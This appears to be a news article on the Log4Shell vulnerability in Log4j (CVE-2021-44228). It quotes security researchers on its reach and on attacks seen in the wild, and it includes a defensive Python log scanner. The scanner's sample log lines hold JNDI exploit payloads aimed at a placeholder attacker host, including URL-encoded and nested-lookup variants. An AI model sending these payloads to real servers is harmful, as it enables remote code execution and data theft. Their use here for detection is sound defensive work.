Cybersecurity experts are seeing a wide variety of use cases for the Log4j exploit already beginning to appear on the dark web, ranging from exploiting Minecraft servers to more high-profile issues they believe could potentially affect Apple iCloud. “This Log4j vulnerability has a trickle-down effect, impacting all large software providers that might use this component as part of their application packing,” John Hammond, Senior Security Researcher at Huntress, told Lifewire via email. “The security community has uncovered vulnerable applications from other technology manufacturers like Apple, Twitter, Tesla, [and] Cloudflare, among others. As we speak, the industry is still exploring the vast attack surface and risk this vulnerability poses.”

Fire in the Hole

The vulnerability, tracked as CVE-2021-44228 and dubbed Log4Shell, has the highest severity score of 10 in the Common Vulnerability Scoring System (CVSS). GreyNoise, which analyzes Internet traffic to pick up security signals of note, first observed activity for this vulnerability on December 9, 2021. That’s when weaponized proof-of-concept exploits (PoCs) began to appear, leading to a rapid increase in scanning and public exploitation on December 10, 2021, and through the weekend. Log4j is heavily integrated into a broad set of DevOps frameworks and enterprise IT systems, as well as into end-user software and popular cloud applications. Explaining the severity of the vulnerability, Anirudh Batra, a threat analyst at CloudSEK, tells Lifewire via email that a threat actor could exploit it to run code on a remote server. “This has left even popular games like Minecraft also vulnerable. An attacker can exploit it just by posting a payload in the chatbox. Not only Minecraft, but other popular services like iCloud [and] Steam are also vulnerable,” Batra explained, adding that “triggering the vulnerability in an iPhone is as simple as changing the name of the device.”

Tip of the Iceberg

Cybersecurity company Tenable suggests that because Log4j is included in a number of web applications and is used by a variety of cloud services, the full scope of the vulnerability won’t be known for some time. The company points to a GitHub repository that tracks the impacted services, which at the time of writing lists about three dozen manufacturers and services, including popular ones such as Google, LinkedIn, Webex, Blender, and others mentioned earlier. Until now, the vast majority of activity has been scanning, but exploitation and post-exploitation activities have also been seen. “Microsoft has observed activities including installing coin miners, Cobalt Strike to enable credential theft and lateral movement, and exfiltrating data from compromised systems,” writes the Microsoft Threat Intelligence Center.
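Since most of the activity GreyNoise and Microsoft describe is scanning, the practical first step for a defender is to look for lookup strings in attacker-controlled fields of existing logs (request paths, User-Agent, Referer). The following is an added example, not code from Lifewire, GreyNoise, Microsoft or the Apache project: it normalizes URL-encoded log lines and flags the Log4j lookup marker, plus the more generic case of one lookup nested inside another, which legitimate logged input rarely contains. The log lines in SAMPLE_LOG are constructed for the example, and the host name attacker.example is a placeholder.

```python
import re
from urllib.parse import unquote

# Case-insensitive marker for a Log4j JNDI lookup appearing in logged input.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

# A lookup opened inside another lookup ("${ ... ${ ...") is unusual in
# legitimate requests and is flagged even when the word "jndi" is not literal.
NESTED_RE = re.compile(r"\$\{[^}]*\$\{")


def normalize(line):
    """URL-decode repeatedly (proxies often encode once or twice) until stable."""
    for _ in range(3):
        decoded = unquote(line)
        if decoded == line:
            break
        line = decoded
    return line


def classify(line):
    """Return 'jndi-lookup', 'nested-lookup' or None for a single log line."""
    text = normalize(line)
    if JNDI_RE.search(text):
        return "jndi-lookup"
    if NESTED_RE.search(text):
        return "nested-lookup"
    return None


def scan(lines):
    """Return (line_number, verdict, raw_line) for every flagged line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        verdict = classify(line)
        if verdict is not None:
            hits.append((number, verdict, line))
    return hits


# Constructed web-server access log lines (combined log format); not real traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:09 +0000] "GET /%24%7Bjndi%3Aldap%3A%2F%2Fattacker.example%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.9 - - [10/Dec/2021:12:00:11 +0000] "GET / HTTP/1.1" 200 512 "${${date:yyyy}:x}" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for number, verdict, line in scan(SAMPLE_LOG):
        print(f"line {number}: {verdict}: {line}")
```

Run this over a real access log by replacing SAMPLE_LOG with the file's lines; a hit on either verdict is a reason to check whether the receiving application logs that field through a vulnerable Log4j version, and to look for the post-exploitation indicators Microsoft lists above (coin miners, Cobalt Strike, outbound data transfer) on that host.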

Batten Down the Hatches

It’s no surprise, then, that due to the ease of exploitation and prevalence of Log4j, Andrew Morris, Founder and CEO of GreyNoise, tells Lifewire that he believes the hostile activity will continue to increase over the next few days. The good news, however, is that Apache, the developers of the vulnerable library, has issued a patch to neuter the exploits. But it’s now up to individual software makers to patch up their versions to protect their customers. Kunal Anand, CTO of cybersecurity company Imperva, tells Lifewire over email that while most of the adversarial campaign exploiting the vulnerability is currently directed towards enterprise users, end-users need to stay vigilant and make sure they update their affected software as soon as patches are available. The sentiment was echoed by Jen Easterly, Director at the Cybersecurity and Infrastructure Security Agency (CISA). “End users will be reliant on their vendors, and the vendor community must immediately identify, mitigate, and patch the wide array of products using this software. Vendors should also be communicating with their customers to ensure end-users know that their product contains this vulnerability and should prioritize software updates,” said Easterly via a statement.